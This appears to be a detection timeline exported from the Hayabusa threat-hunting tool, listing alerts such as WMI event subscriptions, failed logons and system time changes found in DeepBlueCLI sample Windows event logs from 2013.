1392013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1402013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1412013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1422013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1432013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1442013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1452013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1462013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1472013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1482013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1492013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1502013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1512013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1522013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1532013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1542013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1552013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1562013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1572013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1582013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1592013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1602013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1612013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1622013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1632013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1642013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1652013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1662013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1672013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1682013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1692013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1702013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1712013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1722013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1732013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1742013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1752013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1762013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1772013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1782013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1792013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1802013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1812013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1822013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1832013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1842013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1852013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1862013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1872013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1882013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1892013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1902013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1912013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1922013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1932013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1942013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1952013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1962013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1972013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1982013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1992013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2002013-10-24 02:45:45.037 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x57d8drules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2012013-10-24 02:46:57.850 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2022013-10-24 02:48:29.225 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2032013-10-24 02:48:29.850 +09:00IE8Win721highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2042013-10-24 02:49:38.890 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2052013-10-24 02:49:38.890 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2062013-10-24 02:50:25.546 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2072013-10-24 02:50:27.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2082013-10-24 02:50:33.551 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2092013-10-24 02:50:33.551 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2102013-10-24 02:50:33.551 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2112013-10-24 02:51:17.207 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2122013-10-24 02:51:17.207 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2132013-10-24 02:51:17.207 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2142013-10-24 02:51:17.207 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x27f43rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2152013-10-24 02:53:48.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2162013-10-24 02:53:48.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2172013-10-24 02:58:14.879 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2182013-10-24 03:32:03.644 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2192013-10-24 03:35:43.160 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2202013-10-24 03:37:00.910 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2212013-10-24 03:41:07.910 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2222013-10-24 03:44:49.144 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2232013-10-24 03:48:33.988 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2242013-10-24 03:48:37.144 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2252013-10-24 03:48:37.144 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2262013-10-24 03:49:28.191 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2272013-10-24 03:57:47.863 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2282013-10-24 04:00:03.457 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2292013-10-24 04:02:24.316 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x27f73rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2302013-10-24 04:02:44.129 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2312013-10-24 04:02:44.129 +09:00IE8Win721highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2322013-10-24 04:04:09.406 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2332013-10-24 04:04:09.406 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2342013-10-24 04:04:28.750 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2352013-10-24 04:04:55.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2362013-10-24 04:05:04.098 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2372013-10-24 04:05:04.098 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2382013-10-24 04:05:04.098 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2392013-10-24 04:05:59.484 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2402013-10-24 04:05:59.484 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2412013-10-24 04:06:18.921 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2422013-10-24 04:06:25.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2432013-10-24 04:07:16.729 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2442013-10-24 04:07:16.729 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2452013-10-24 04:07:16.729 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2462013-10-24 04:10:27.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2472013-10-24 04:10:27.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2482013-10-24 04:19:23.812 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2492013-10-24 04:19:23.812 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2502013-10-24 04:19:46.750 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2512013-10-24 04:19:52.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2522013-10-24 04:20:01.879 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2532013-10-24 04:20:01.879 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2542013-10-24 04:20:01.879 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2552013-10-24 04:22:39.125 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2562013-10-24 04:22:39.125 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2572013-10-24 04:23:04.093 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2582013-10-24 04:23:08.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2592013-10-24 04:23:18.798 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2602013-10-24 04:23:18.798 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2612013-10-24 04:23:18.798 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2622013-10-24 04:25:30.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2632013-10-24 04:25:30.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2642013-10-24 04:27:14.204 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2652013-10-24 04:27:14.204 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2662013-10-24 04:27:14.204 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2672013-10-24 04:27:14.204 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x39a20rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2682013-10-24 04:34:43.415 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2692013-10-24 04:34:43.415 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2702013-10-24 04:34:43.415 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2712013-10-24 04:34:43.415 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2722013-10-24 04:34:43.415 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2732013-10-24 04:34:54.649 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x39a67rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2742013-10-24 04:36:30.093 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2752013-10-24 04:36:30.093 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2762013-10-24 04:36:39.718 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2772013-10-24 04:36:44.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2782013-10-24 04:36:53.245 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
